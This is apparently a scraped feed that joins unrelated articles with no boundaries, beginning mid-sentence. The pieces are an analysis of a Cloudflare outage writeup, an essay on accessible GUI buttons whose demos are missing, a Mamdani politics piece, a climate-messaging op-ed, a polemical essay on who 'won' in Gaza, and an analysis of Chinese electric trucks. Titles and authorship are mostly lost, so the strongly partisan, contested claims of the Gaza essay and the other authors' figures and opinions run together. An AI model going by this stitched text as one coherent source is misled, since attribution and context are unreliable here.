Cloudflare Bot Management
system. Specifically, it was in the
bot scoring
functionality, which estimates the likelihood that a request came from a bot rather than a human.
This is a system that is
designed to help protect their customer from malicious bots
, and yet it ended up hurting their customers in this case rather than helping them.
As I’ve
mentioned previously
, once your system achieves a certain level of reliability, it’s the protective subsystems that end up being things that bite you! These subsystems are a net positive, they help much more than they hurt. But they also add complexity, and complexity introduces new, confusing failure modes into the system.
The Cloudflare case is a more interesting one than the typical instances of this behavior I’ve seen, because Cloudflare’s whole business model is to offer different kinds of protection, as products for their customers. It’s protection-as-a-service, not an internal system for self-protection. But even though their customers are purchasing this from a vendor rather than building it in-house, it’s still an auxiliary system intended to improve reliability and security.
Confusion in the moment
What impressed me the most about this writeup is that they documented some aspects of
what it was like responding to this incident
: what they were seeing, and how they tried to made sense of it.
In the internal incident chat room, we were concerned that this might be the continuation of the recent spate of high volume
Aisuru
DDoS attacks
:
Man, if I had a nickel every time I saw someone Slack “Is it DDOS?” in response to a surprising surge of errors returned by the system, I could probably retire at this point.
The spike, and subsequent fluctuations, show our system failing due to loading the incorrect feature file. What’s notable is that our system would then recover for a period. This was very unusual behavior for an internal error.
We humans are excellent at recognizing patterns based on our experience, and that generally serves us well during incidents. Someone who is really good at operations can frequently diagnose the problem very quickly just by, say, the shape of a particular graph on a dashboard, or by seeing a specific symptom and recalling similar failures that happened recently.
However, sometimes we encounter a failure mode that we haven’t seen before, which means that we don’t recognize the signals. Or we might have seen a cluster of problems recently that followed a certain pattern, and assume that the latest one looks like the last one. And these are the hard ones.
This fluctuation made it unclear what was happening as the entire system would recover and then fail again as sometimes good, sometimes bad configuration files were distributed to our network. Initially, this led us to believe this might be caused by an attack.
This incident was one of those hard ones: the symptoms were confusing. The “problem went away, then came back, then went away again, then came back again” type of unstable incident behavior is generally much harder to diagnose than one where the symptoms are stable.
Throwing us off and making us believe this might have been an attack was another apparent symptom we observed: Cloudflare’s status page went down. The status page is hosted completely off Cloudflare’s infrastructure with no dependencies on Cloudflare. While it turned out to be a coincidence, it led some of the team diagnosing the issue to believe that an attacker may be targeting both our systems as well as our status page.
Here they got bit by a co-incident, an unrelated failure of their status page that led them to believe (reasonably!) that the problem must have been external.
I’m still curious as to what happened with their status page. The error message they were getting mentions
CloudFront
, so I assume they were hosting their status page on AWS. But their writeup doesn’t go into any additional detail on what the status page failure mode was.
But the general takeaway here is that even the most experienced operators are going to take longer to deal with a complex, novel failure mode, precisely because it is complex and novel! As the resilience engineering folks say,
prepare to be surprised!
(Because I promise, it’s going to happen).
A plea: assume local rationality
The writeup included a screenshot of the code that had an unhandled error. Unfortunately, there’s nothing in the writeup that tells us what the programmer was thinking when they wrote that code.
In the absence of any additional information, a natural human reaction is to just assume that the programmer was sloppy. But if you want to actually understand how these sorts of incidents actually happen, you have to fight this reaction.
People always make decisions that make sense to them in the moment, based on what they know and what constraints they are operating under. After all, if that wasn’t true, then they wouldn’t have made that decision. The only we can actually understand the conditions that enable incidents, we need to try as hard as we can to put ourselves into the shoes of the person who made that call, to understand what their frame of mind was at the moment.
If we don’t do that, we risk the problem of
distancing through differencing
. We say, “oh, those devs were bozos, I would never have made that kind of mistake”. This is a great way to limit how much you can learn from an incident.
Detailed public writeups as evidence of good engineering
The writeup produced by Cloudflare (signed by the CEO, no less!) was impressively detailed. It even includes a screenshot of a snippet of code that contributed to the incident! I can’t recall ever reading another public writeup with that level of detail.
Companies generally err on the side of saying less rather than more. After all, if you provide more detail, you open yourself up to criticism that the failure was due to poor engineering. The fewer details you provide, the fewer things people can call you out on. It’s not hard to find people online criticizing Cloudflare online using the details they provided as the basis for their criticism.
Now, I think it would advance our industry if people held the opposite view: the more details that are provided an incident writeup, the
higher esteem we should hold that organization
. I respect Cloudflare is an engineering organization a lot more precisely because they are willing to provide these sorts of details. I don’t want to hear what Cloudflare
should have done
from people who weren’t there, I want to hear us hold other companies up to Cloudflare’s standard for describing the details of a failure mode and the inherently confusing nature of incident response.
Pocketbase – open-source realtime back end in 1 file
I appreciate that someone else understands that being a GUI has some basic requirements and “draws to the screen” is not the interesting one. The bar is about 20cm off the floor but everyone forgets to jump.
Despite mostly not working on GUIs in my career, I have strong opinions about consistency and about affordances for beginners and power users alike. So today, let’s take a simple case study: a button.
No one
really
agrees these days on what a button should look like, but we can figure that out later. For now, we can take an icon and draw a border around it and that probably counts:
A disclaimer: we’ll be working in HTML and CSS, and you can view the page source to see how I did each of the examples, but I’m not trying to make the best HTML or CSS here. Instead, I’m trying to demonstrate how someone might try to build a UI element from scratch, in or out of a browser. (It’s up to you to judge how successful I am.)
Buttons are specifically UI elements that do things, so let’s add an action when you click it:
Perfect! We’re basically done, right?
(Note to voice control users: for this article I have specifically hidden the first several examples from readers/tools
so you don’t have to wade through iterations of the same boring thing. It’s just bringing up a dialog. Unfortunately, when we get to the point of talking about focused elements you’ll start hearing some incomplete descriptions.)
There are lots of ways to submit an action
If you’re reading this on a phone, you probably noticed the first wrong thing: I made it work if you
click
the button with a cursor, but not if you tap it with a finger. Let’s fix that:
Are we done? Well, no. Users sometimes misclick, and so OSs back to
System 1.0 for the Mac
(possibly even earlier) have a feature called
drag cancellation
or
pointer cancellation,
where if you drag away from the button before letting go of the click/tap, it doesn’t fire. This behavior can’t be provided with only one of “mouse down on my UI element” and “mouse up on my UI element”; you need both, or some higher-level operation.
1
To be fair I had to go a little out of my way to do this section, for demonstration purposes. Modern web browsers pack up everything we’ve been talking about in a single “click” event that handles both clicks and taps as well as drag-cancellation. But if you’re trying to make a button from scratch
outside
of a web browser, you might have made this mistake.
Keyboard navigation
Some people don’t use a mouse—whether to keep their hands efficiently on the keyboard, or because they don’t have the manual dexterity to use pointing devices, or both, or some other reason. To facilitate this, desktop OSs let you tab between all the interactable items in a window—not just form fields, but
everything
you might need to interact with. (These days it’s often tucked away in a setting called “Full keyboard access” or something, but sometimes even without hunting for that you might be able to get it to work with Option-Tab or Ctrl-Tab. Adding Shift goes backwards.) Our button should support this.
We also didn’t say anywhere to draw a ring when
focused
(in fact, maybe your web browser doesn’t, but mine does). Let’s fix that by adding some explicit style information:
Even here we’re still relying on the web browser to track this “focused” state for us; ultimately
someone
has to know what UI element is focused, and which the “next” and “previous” elements should be.
While we’re here, let’s fix one more display issue from the previous section: buttons should show some feedback when you start to press them, to go with the drag-cancellation feature and also so you can tell that the click happened at all. We’re again going to lean on the web browser for this
active
or
highlighted
state, but it really does make the experience much better.
Voice control
Some people don’t use a mouse
or
keyboard to control their computers. Instead, they use voice recognition programs that can translate commands into UI actions. For yet another time, the web browser assists us here: if you can manage to select one of the “focusable” button above, you can activate it.
However, voice control is often paired with screen reading: a navigation for people who can’t use a display (usually because of visual impairment, but I have on a handful of occasions used it to work with a computer I had no monitor for). There are a number of ways interactable UI elements show up there, but in this case let’s just see what happens when the user focuses the button (using keyboard navigation, or a scroll wheel, or something):
Oh dear. We used an icon with no
alt text
, so the user has no idea what this button does. This is more about
images
than about
buttons
specifically, but even with a text button you may still want your screen-reader label / “accessibility label” to be different from the displayed text, since the user may not have the same contextual information when they navigate to it.
Okay, fixed. Ish. Again, web browsers are helping out a lot here; every OS has a different accessibility interface, and every GUI toolkit has to plug into it. Or not, and frustrate users.
Key Equivalents
We’re finally approaching something that behaves like a button from 1990. It’s still not very pretty, but most of the changes we’ve been making have been to things other than appearance. Here’s one more: did you know many buttons on your system have keyboard shortcuts, just like menu items? On Windows these are usually Alt-something; on a Mac they’re Cmd-something like menu items. (Most of the time this only matters for dialog boxes; the rest of the time most buttons have equivalent menu items anyway.)
This is less common in web pages in general. It’s not even that common in general, beyond standard shortcuts of Return for default actions, Escape for Cancel, and maybe Cmd-Delete for “confirm remove”. But we’ll add it here anyway: if you’re a power user, this button can now be pressed with Ctrl-B, or perhaps Ctrl-Option-B, or maybe Alt-Shift-B, or… (
It depends on your browser and OS
, and the chart doesn’t even seem to be up to date.)
Consistency
Even with all this, we
still
don’t have something that behaves like a normal button. It doesn’t “highlight” when pressing Space, because I didn’t explicitly write code for it. VoiceOver, the macOS screenreader, calls it a “group” or “image” rather than a button. It doesn’t support a “disabled” state.
It turns out this has been the wrong approach from the start, at least for an application or web page. We don’t need to do any of this. We can start with a system-provided button:
And then customize it to do our own drawing.
It’s still a chunk of the work we had before, but
now
we and the web browser agree that it’s a button, and we get most of what we discussed for free. As well as anything else I forgot in making this blog post.
Conclusion
All that for a button. Lists, sliders, and tables are more complicated, and text editing is so complicated that even a number of apps that otherwise roll their own UI (usually games) still use the system text input.
The general moral here is that we, as an industry, have had
40 years
to establish what desktop GUIs are like, over 30 to establish what web pages are like, and nearly 20 to establish what mobile GUIs are like. Not every tradition is good, but if you’re a sighted mouse-user, you might not even know what you’re omitting when you diverge from conventions. Which translates to people being frustrated with your app or web page, or in the worst case not being able to use it at all.
If you’re an app developer, the lesson is simple: if you want to customize a UI element, start with a standard one and change how it draws, rather than building one up from scratch and trying to match the system in every little way. If you are a GUI library author, things might be trickier. You’re
trying
to rebuild things, and there’s a good chance you
do
know more than me about GUIs. But please at least consider if it’s going to work with a screenreader.
P.S. Let this not discourage
exploration,
taking apart existing UI elements and building new ones to see how they work. I just want people to stop thinking “works for me” is good enough.
xkcd.com is best viewed with Netscape Navigator 4.0 or below on a Pentium 3±1 emulated in Javascript on an Apple IIGS
at a screen resolution of 1024x1. Please enable your ad blockers, disable high-heat drying, and remove your device
from Airplane Mode and set it to Boat Mode. For security reasons, please leave caps lock on while browsing.
To Win Radical Success, Mamdani Understands, Is To Know When and Where To Compromise
Portside
portside.org
2025-11-28 02:06:00
To Win Radical Success, Mamdani Understands, Is To Know When and Where To Compromise
jay
Thu, 11/27/2025 - 21:06
...
New York City Mayor-elect Zohran Mamdani and New York City Police Commissioner Jessica Tisch shake hands after their visit to the New York City Police Memorial, November 19, 2025. | Credit: Richard Drew/AP Photo // The American Prospect
Mamdani’s ultra-disciplined campaign focused on a handful of policies that New Yorkers both needed and wanted: affordable housing and universal child care above all, along with free buses and a handful of city-owned grocery stores. Like Bernie Sanders and Alexandria Ocasio-Cortez, Mamdani is a democratic socialist, but also like them, his agenda is garden-variety social democratic. To win its enactment—in a word, to deliver—requires a host of accommodations with a political establishment that is not all that social democratic itself. The price for delivering on his core issues is compromise on other issues. And like all successful principled political leaders, Mamdani gets that in his bones.
Part of getting that means he must avoid making political enemies when doing so would imperil his agenda. Back in July, when I
wrote
that Democratic primary victor Mamdani would likely start picking up endorsements from establishment Democrats, I noted that he needed a progressive challenge to House Democratic leader and Brooklyn Rep. Hakeem Jeffries like the proverbial hole in the head. In time, Jeffries did endorse Mamdani, and today, Mamdani has made clear that he does not back progressive Democrat Chi Ossé’s challenge to Jeffries in next year’s congressional primary and has even persuaded the New York chapter of DSA not to endorse him. Opposing Jeffries after Jeffries had endorsed him (however half-heartedly) would upset Jeffries ally Gov. Kathy Hochul, whose support Mamdani needs to fund and create universal child care.
Nor does Mamdani need to further estrange New York’s police, even though his previous critiques of the force are no less true than when he levied them. A disconsolate or even rebellious force can undo a mayoralty or even a city, and New York’s patrol-officer union made clear during Bill de Blasio’s term in office that it was more than willing to lie down on the job at the slightest sign of what it interpreted as disrespect. Mamdani’s reappointment of Police Commissioner Jessica Tisch was a sign that he’d try to avoid inflaming the easily flammable police. Creating an uncomfortable civic peace on that one front gives him the space to focus on child care and housing.
So far, New York DSA appears to understand that such compromises are the price of social democratic power. Their refusal to endorse Ossé indicates that they know the stakes for municipal socialism depend on Mamdani’s success in delivering on his agenda, and
not
on his adhering to any form of doctrinal socialist purity (never mind that DSA has never fully agreed on what socialist purity constitutes). This realpolitik in the ranks is increasingly characteristic of DSA locals in most large cities, where DSA candidates have won electoral office only with broad liberal support and govern in informal coalition with non-DSA progressives. In many smaller locals, where DSA candidates remain on the electoral outs and have failed to form alliances with the broader left (often, where the broad left itself is too weak to win elections), a more sectarian outlook often prevails, and is overrepresented on what passes for the organization’s national political committee.
Since Mamdani’s election, New York DSA has continued to grow and may soon reach a new high of 15,000 members. That said, Mamdani’s campaign mobilized roughly 100,000 volunteers, an astonishing achievement that means his base overwhelmingly does not consist of DSA members, and that he’s answerable, even in the most narrow definition of “answerability,” to a much broader group than DSA. Just as Mamdani must govern within a broad left coalition, so New York DSA must—or at least, should—understand that its fortunes and capacities are maximized only when it acts within a broad left coalition, too. So far, that appears to be the case.
Maintaining the unity and clout of that coalition will be required if the Mamdani agenda is to be realized. The city lost its fiscal independence—the ability, say, to levy its own taxes—during the near-bankruptcy of the 1970s, when it ceded that power to the state. If Mamdani’s legions stay mobilized in support of the higher taxes on Gotham’s gazillionaires that are required to fund universal child care, they can certainly compel the state legislature to enact them. And if they can stay mobilized to swell Hochul’s vote in her upcoming re-election contest, they can likely persuade her to sign that bill. It’s not as if a 2 percent tax hike on New York’s richest is unpopular with anyone other than New York’s richest.
Even without New York’s one-off dependence on Albany, a progressive city can’t be an island, entire of itself, if it’s to be successful. Mamdani rightly judges Fiorello La Guardia to have been the city’s greatest mayor, but La Guardia’s success in building a social democratic New York was in no small part due to his relationship with Franklin Roosevelt, who made sure that abundant federal aid flowed to the city. (On federal employment programs like the WPA, the feds established a direct liaison office with each of the 48 states—and with one city, New York, which it treated like a state of its own.) The best Mamdani can hope for from our current, sub-ideological president is that he doesn’t clog the city with his deportation goons, but that’s a relationship Mamdani needs to continue working on as well. Radical reform can sometimes require radical pragmatism.
We’ve seen such concessions before. In 1589, Henry of Navarre inherited the French throne, but he was a Protestant in a majority-Catholic country, and parts of that country—most particularly, its capital and largest city—refused to recognize his rule so long as he was a Protestant. Henry had an ambitious agenda of domestic development and (largely anti-Hapsburg) foreign alliances, but his religious affiliation stood in the way of his rallying the nation to the causes (none of them religious) that he deeply believed in.
So he converted to Catholicism, with the famous, if likely apocryphal, words: “Paris is worth a mass.”
New York, Mamdani most surely understands, is worth a Tisch.
Virginia Gov.-elect Abigail Spanberger speaks at a campaign event in Annandale, Virginia, on October 30. | Photo by Jared Serre / FFX Now
Over the last several months, reports from billionaire-funded centrist advocacy groups, like
WelcomePAC
and
Searchlight Institute
, have insisted that Democrats stop talking about climate change—either in their campaigns or while governing. Climate change has little resonance for voters, they claim,
comparing
the polling on reliably unpopular policies like “create a carbon tax” with reliably popular policies like “lower the gas tax.”
Unfortunately, this message appears to be reaching its intended audience. In just the last week, New York Governor
Kathy Hochul
approved a new gas pipeline that President Donald Trump has been championing, while Pennsylvania Governor
Josh Shapiro
dropped his state’s effort to join the Regional Greenhouse Gas Initiative.
The idea that Democrats should abandon the most existential fight human civilization has ever faced is a particularly bizarre lesson to draw following Democrats’ huge wins this November, when many of the party’s victorious candidates explicitly
championed
clean energy investments and accountability for fossil fuel company profiteering as solutions to rising energy costs.
A
memo
published Wednesday by Data for Progress and Fossil Free Media therefore makes the exact opposite argument: Democrats shouldn’t run from climate. Instead, they should translate both the impact of climate change and the benefits of climate action for voters. The new memo, which I participated in drafting, points to evidence showing that, contrary to WelcomePAC’s and Searchlight’s portrayal of climate change as a niche social issue, climate-related costs already are top-of-mind, pocketbook concerns for most Americans.
A
majority of voters
say they believe climate change will have a direct financial impact on their families. Millions of voters are already feeling the pain of skyrocketing home insurance rates, which are driven by the increased risk of severe weather from climate change. Millions more are confronted each year with the staggering costs of disaster recovery from extreme weather events exacerbated by the climate crisis. And a
strong majority
of Americans are struggling with rising electricity prices, a problem that just 5 percent of voters blame on renewables versus corporate profits (38 percent), data centers (14 percent), and grid pressures from extreme weather (11 percent). On the flip side, expanding clean energy is the fastest way to produce cheap electricity needed to lower utility rates—and Democrats hold a massive trust advantage over Republicans when it comes to clean power.
This trust gap is a key part of the argument that Data for Progress and Fossil Free Media are making. Their memo points to findings that, right now, neither party has a significant trust advantage on “electric utility bills” (D+1) or “the cost of living” (R+1). But Democrats do have major trust advantages on “climate change” (D+14) and “renewable energy development” (D+6). By articulating how their climate and clean energy agenda can address these bread-and-butter concerns, Democrats can leverage their advantage on climate to win voters’ trust on what will likely be the most significant issues in 2026 and 2028.
The formula for doing this is pretty simple: First, explain why bills are rising and who’s to blame (utilities, fossil fuel volatility, data-center demand, climate disasters); second, commit to implementing visible cost relief (rate freezes, clean energy buildout); and third, name who will pay (polluters and profiteers, not regular people). Or, to simplify all this into one clear campaign-ready sentence: “We’ll take on rising electricity bills by building the cheapest power and stopping monopoly price-gouging, all while making polluters, not families, pay their fair share.”
The best part about this populist approach to climate is how obviously it contrasts with Trump and the Republicans. Imagine being able to tout this contrast in every stump speech in 2026: Democrats are trying to expand cheap, clean energy to secure lower rates, while Trump is trying to keep
outdated coal plants
running, forcing ratepayers to shoulder billions in extra costs. Democrats are getting tough on price-gouging utilities, while Republicans are giving these corporations free rein. Democrats are fighting to make polluters pay for increasingly costly climate disasters; Republicans want all of us to pay for the damage Big Oil caused.
Abandoning the climate fight would be a profoundly morally reprehensible course of action. (It’s a particularly unforgivable message when it comes from billionaires like Reid Hoffman, who are
funding
the groups telling Democrats to forget about climate while building their own luxury bunkers for “
apocalypse insurance
.”) It’s also a huge political mistake. To give up on climate, an issue that Democrats are trusted on, is to throw away a tool that Democrats can use to offer credible solutions to the cost-of-living crises affecting working people throughout the country.
“Heading into 2026,” the memo reads, “Democrats have a chance to define themselves as the party that will build the cheapest energy, crack down on profiteering, and make polluters, not families, pay for the climate damage they’ve caused.” That is, substantively, a great climate agenda. It’s also a winning electoral message, and one Democrats should be running on, not from.
Aaron Regunberg
is a contributing editor at The New Republic, a climate lawyer, and a progressive organizer.]
At the time of writing, there is a ceasefire in effect in Gaza, although it is one-sided, because as usual in such cases, Israel continues occasionally to bomb the Strip. The experience of previous such ceasefires does not inspire confidence that this one will hold for long. Still, it may be useful to reflect on the situation as it currently exists and pose the question: if this were the end, which side won? One way of determining that is to look at the war aims of each of the two parties and see which were realised and which were not. If one side attained the most important of their aims, it ‘won’; if it did not, it ‘lost’.
There are, of course, tremendous differences in the resources and capacities of the two sides: Israel has a large and carefully trained military with a virtually unlimited supply of the most modern, high-tech weapons in the world, including fighter jets, tanks and helicopters, whereas the Palestinian side is a coalition of militias comprising a few fighters equipped with small arms, home-made rockets and some improvised devices (mostly constructed, it seems, from salvaged, unexploded Israeli ordnance). This means that the possible aims which the two sides could envisage are also systematically different.
The Israelis did succeed in causing massive destruction, but they attained none of their official (or semi-official) war aims. They did not exterminate the population in Gaza or drive it from the Strip, despite two years of total war; they did not defeat, disarm and disband Hamas, and they did not retrieve their hostages by direct military means – virtually all were recovered through negotiation with Hamas, although negotiation was the last thing Israel said it wanted.
If the Israelis lost, does that mean that the Palestinians won? A case could be made for this. After all, the stated aim of Hamas was to acquire the means to engage in an exchange of prisoners. The Israelis hold thousands of Palestinian prisoners, including many children, and many detained long-term without charge. Since under international law Israel is illegally occupying East Jerusalem, the West Bank and Gaza and an occupied population has a right to armed resistance against the occupying power, taking Israeli military personnel prisoner is in principle perfectly legal. Since Israeli governments have in the past been willing to exchange prisoners, acquiring some Israeli military prisoners could have seemed a good way to free detained Palestinians. That turned out to be a correct calculation, in that a mutually agreed exchange of prisoners did eventually take place.
Moreover, it is perhaps not fanciful to discern an ulterior aim, namely, to put Israel in a position in which it dropped its mask of being a liberal, rational society, and revealed its true nature as a lawless and bloodthirsty predator. If indeed Hamas had that as one of its goals on 7 October, they seem to have attained it beyond what anyone could have imagined. No one who watched the gleefully live-streamed genocide which the IDF was carrying out could ever think about the State of Israel, or Zionism, in the same way again. Once the mask fell, it became hard to unsee Zionism’s true face. The events in Gaza have transformed, perhaps permanently, not just attitudes toward the current government in Israel and Israeli society as a whole – which has overwhelmingly and enthusiastically supported the genocide – but also the way people think about the whole history of Zionist settlement in Palestine.
Seeing the destruction in Gaza play out in real time has, in other words, irrevocably changed the commonly accepted view of Israel’s past. Fewer and fewer people now think of this as a desperate attempt to construct a safe refuge for a persecuted group; increasingly it is viewed as just another instance of the old European colonialist story, that is, like the British settlements in Ireland, Australia and North America, French Algeria, apartheid South Africa, and so on. This idea of Israel as a settler-colonial state has been around since the beginning of Zionism, many of whose early leaders described their project in these terms. It got a momentary boost in the West when the distinguished scholar Maxime Rodinson published his essay ‘Israel, fait colonial’ in
Les Temps Modernes
in 1967, but it remained a niche view until the horrors in Gaza became too blatant to ignore. Now it is mainstream, and it will not easily be dislodged.
Was Hamas’s action on 7 October an unmitigated ‘success’? That seems hard to accept because of the immense price that was paid: 70,000 documented civilian deaths (including over 20,000 children) with many still buried under the ruins, an artificially induced famine, untold deaths from long-term, but direct, effects of the war, thousands of child amputees (many of whose limbs had to be amputated without anaesthetic because Israel blocked medical supplies), hospitals, schools and civilian infrastructure bombed to rubble.
That the cost of ‘success’ may be too great to bear was noted by King Pyrrhus of Epirus in 279 BC, when he remarked about the Battle of Asculum: ‘One more victory like that, and we’re done for.’ Was the price for 7 October worth paying? Any attempt to answer this would have to consider various things, including what the alternative was. Was the status quo pre-7 October (a decade-long siege of Gaza by Israel) tolerable in the long run? Who is to say? If the majority of Palestinians think what they have had to suffer was worth it, is it for observers from afar to contradict them? If what is at issue is a general evaluation of the events of 7 October and their consequences, presumably Israelis, too, may claim to have a voice in discussing this. To ‘have a voice’ does not of course mean to be able to dictate the terms of discussion or to have any kind of veto. And we should not expect unanimity.
Losing control of the narrative of a conflict is not the worst thing that can happen to a group, just as simple military defeat is arguably not the worst possible outcome of a war. In the American Civil War, the Unionist forces of the North triumphed and it is their version of events that we now read, but though the American South was devastated and the political structure of the Confederacy dismantled, the population continued to exist and there are plenty of accounts of the war from a pro-Confederacy perspective. The fate of the ancient city of Carthage is grimmer in both respects: it was not just defeated but obliterated by the Romans at the end of the Third Punic War. In addition, we have no idea how the Carthaginians viewed the war because all Carthaginian accounts disappeared completely. Until the advent of modern archaeology all we knew about Carthage, its people and their beliefs was what we were told by their enemies, the Greeks and Romans.
Many Israelis do not merely wish to expel or exterminate the Palestinians, they wish to convince people that they never existed at all. It is a simple fact, however, that ample documentation of the atrocities in Gaza now exists in the public domain. The Palestinian cause has come to resemble opposition to the war in Vietnam or to apartheid in South Africa, something which has been taken up all over the world, by many people who are not directly involved and by many more than the usual suspects; this is to a large extent the result of Israel’s own actions. The efforts of Israel and its Western allies to control the narrative have been more or less completely ineffectual. The future is unknown, but we can be reasonably sure that whoever eventually writes the history, the Israeli wish to expunge the very name ‘Palestinian’ from the record will not be fulfilled.
[This is
Sidecar
, the NLR blog. Launching in December 2020, Sidecar aims to provide a space on the left for international interventions and debate. A buzzing and richly populated left-media landscape has emerged online in the past decade, but its main English-speaking forms have been largely monoglot in outlook and national in focus, treating culture as a subsidiary concern. By contrast, political writing on Sidecar will take the world, rather than the Anglosphere, as its primary frame. Culture in the widest sense – arts, ideas, mores – will have full standing. Translation of, and intellectual engagement with, interventions in languages other than English will be integral to its work. And while New Left Review appears bi-monthly, running articles of widely varied length, Sidecar will post several items a week, each no longer than 2,500 words and many a good deal shorter.]
Cheap Chinese battery electric heavy trucks are no longer a rumor. They are real machines with real price tags that are so low that they force a reassessment of what the global freight industry is willing to pay for electrification. Standing in a commercial vehicle hall in Wuhan and seeing a 400 kWh or 600 kWh truck priced between €58,000 and €85,000, as my European freight trucking electrification contact
Johnny Nijenhuis recently did
, changes the frame of the entire conversation. These are not diesel frames with a battery box welded underneath. They are purpose built electric trucks built around LFP packs, integrated e-axles and the simplified chassis architecture that becomes possible when the engine bay, gearbox, diesel tank, emissions controls and half of the mechanical complexity of a truck disappear. Anyone who has worked with heavy vehicles knows the cost structure of diesel powertrains. Removing that entire system while building at very large scale produces numbers that do not match Western experience.
China’s low price electric trucks do not arrive as finished products for Europe or North America. They need work. Western short haul freight fleets expect certain features that Chinese domestic buyers usually skip. Tires need to carry E-mark or FMVSS certification. Electronic stability controls must meet UNECE R13 or FMVSS 121. Cab structures need to meet R29 or similar requirements. Crash protection for battery packs needs to satisfy R100 or FMVSS 305. European drivers expect better seats, quieter cabs and stronger HVAC. Even in short haul work, fleets expect well understood advanced driver assistance (ADAS) features to handle traffic and depot work. However, inexpensive Chinese leaf springs are just fine for short haul trucking given the serious upgrade to driver comfort and truck performance of battery electric drivetrains.
When these adjustments are added into the bill of materials and spread across a production run, the upgrades land in the €20,000 to €40,000 range for short haul duty, per my rough estimate. That moves the landed price up to roughly €80,000 to €120,000. The comparison with Western OEM offerings is stark because Western battery electric trucks today often start near €250,000 and can move far higher once options and charging hardware are included. A short haul operator looking at the difference between a €100,000 truck and a €300,000 truck will ask which one meets the actual duty cycle. For operators with depot charging and predictable delivery routes, the cheaper truck is credible in a way that few expected even three years ago.
The long haul story is different. European and North American long haul operators require far more from a truck than a Chinese domestic short range tractor offers. Axle loads need to support 40 to 44 ton gross combined weight. Suspension needs to manage high speed stability for many hours a day on roads built for 80 to 100 km/h cruising. Cab structures must handle fatigue and cross winds on long corridors. Drivers spend nights sleeping in the cab and expect western comfort standards. Trailer interfaces require specific electrical and pneumatic systems that have to meet long established norms. Battery safety systems need to be built for high speed impacts and rollover events. All of that requires a larger budget. The gap between a domestic Chinese tractor and a European or North American long haul tractor is roughly €80,000 to €120,000 once all mechanical, safety and comfort systems are brought to the required levels per my estimate. That does not erase the cost advantage, because even a €180,000 Chinese based long haul electric truck is cheaper than many Western models, but it does shift the choice from simple purchase price to service expectations and lifetime durability.
Most freight is not long haul.
French and German economic councils
have both looked at freight movements through national data and concluded that the majority of truck trips and ton kilometers occur in short haul service. This includes urban deliveries, regional distribution, logistics shuttles between depots and ports, construction supply and waste collection. These trips are usually under 250 km, begin and end at the same depot and involve repeated stop-start movement where electric drivetrains perform well. The idea that the heavy trucking problem is a long haul problem has shaped Western investment priorities for a decade, but national economic councils in Europe now argue that solving short haul electrification first delivers most of the benefit. The fact that low cost Chinese battery electric trucks map almost perfectly onto these duty cycles suggests that they will find receptive markets once import pathways are established.
Chart of heavy truck sales in China assembled by author
China’s shift away from diesel in the heavy truck segment is dramatic. The country sold more than 900,000 heavy trucks in 2024. Diesel’s share fell to about 57% that year. Natural gas trucks rose to around 29%. Battery electric trucks reached 13%. Early 2025 data points to battery electric share rising again to about 22% of new heavy truck sales, with diesel falling close to the 50% mark. These shifts are large movements inside a very conservative sector. Natural gas trucks saw a rapid rise between 2022 and 2024 as operators chased lower fuel prices and simpler emissions compliance, but the price war in battery electric trucks has made electric freight attractive for many of the same operators. Gas trucks still fill some niches, but the pattern suggests that they may face the same pressure that diesel trucks face. Electric trucks with low running costs and high cycle life begin to look compelling to operators once the purchase price falls into a familiar range.
Western OEMs entered China with hopes of capturing a share of the largest truck market in the world, but the results have been mixed. Joint ventures like Foton Daimler once offered a bridge into domestic heavy trucking, yet the rapid rise of low cost local manufacturers in both diesel and electric segments has eroded that position. Western models arrived with higher prices and platforms optimized for different regulations and freight conditions. As domestic OEMs expanded capacity and cut costs, the market shifted toward local brands in every drivetrain category. The impact is clear. Western firms now face reduced market share, weaker margins and strategic uncertainty about long term participation in China’s truck sector.
Underlying these drivetrain transitions is a heavy truck market that is smaller and more complicated than it was five years ago. The peak in 2020, with roughly 1.6 million heavy trucks sold, was not a normal year. It was driven by a large regulatory pre-buy that pulled forward sales before tighter emissions rules arrived. The freight economy was also stronger at that time and the construction sector had not yet entered its recent slowdown. As those drivers faded, the market returned to what looks like a long term equilibrium between 800,000 and one million trucks per year. Several confounding factors overlap in this period. Freight volumes shifted. Rail took a larger share of bulk transport as China achieved what North America and Europe have only talked about, mode shifting. Replacement cycles grew longer. Real estate and construction slowed. Diesel’s loss of share is partly driven by these economic factors and partly driven by the arrival of cheaper alternatives. It is difficult to separate the exact contribution of each. The net result is a natural market size that is much lower than the 2020 peak and a much more competitive fight inside the remaining market.
Hydrogen heavy truck sales in China show a pattern of stalling growth followed by early signs of decline in 2025. Registration data and industry reports indicate that fuel cell heavy trucks were less than 1% of the heavy truck market in 2024, amounting to low single digit thousands of vehicles, and most of these were tied to provincial demonstration subsidies rather than broad fleet adoption. In the first half of 2025 the number of registered hydrogen trucks rose slightly on paper, but analysts inside China noted that real world operation rates were low and that several local programs were winding down as subsidies tightened. At the same time battery electric heavy trucks climbed from 13% of new sales in 2024 to 22% in early 2025. Hydrogen heavy trucks are losing ground inside a market that is moving quickly toward lower cost electric models, and operators are stepping away from fuel cell platforms as more credible electric options appear. I didn’t bother to include hydrogen on the truck statistics chart as it’s a rounding error and not increasing.
One indicator that connects these pieces is diesel consumption. China’s diesel use dropped by about 11% year over year at one point in 2024, which is not a small shift in a country with heavy commercial transport. Part of the drop was due to economic slowing in trucking dominant sectors, but the rise of LNG trucks and electric trucks also contributed. When a truck that once burned diesel every day is replaced by a gas or battery electric truck, national fuel consumption reacts quickly. The fuel market sees these changes earlier than the headline truck sales numbers because thousands of trucks operating every day create a measurable signal in fuel demand. The data is consistent with a freight system that is changing in composition and technology at a pace that would have seemed unlikely a few years earlier.
Western operators have to look at this landscape with practical questions in mind. The leading electric bus manufacturer in Europe is Chinese because it built functional electric buses at lower prices before Western firms did. There is no reason the same pattern will not repeat in trucks. Once the cost of a short haul electric truck falls near the cost of a diesel truck, operators will start to buy them. If the imported option is much cheaper than the domestic option, early fleets will run the numbers and make decisions based on cash flow and reliability. Western OEMs face challenges in this environment because their legacy designs and cost structures are not tuned for the kind of price war that emerged in China. They need to match cost while preserving safety and service expectations, which is difficult while shifting from a century of diesel design to a new electric architecture.
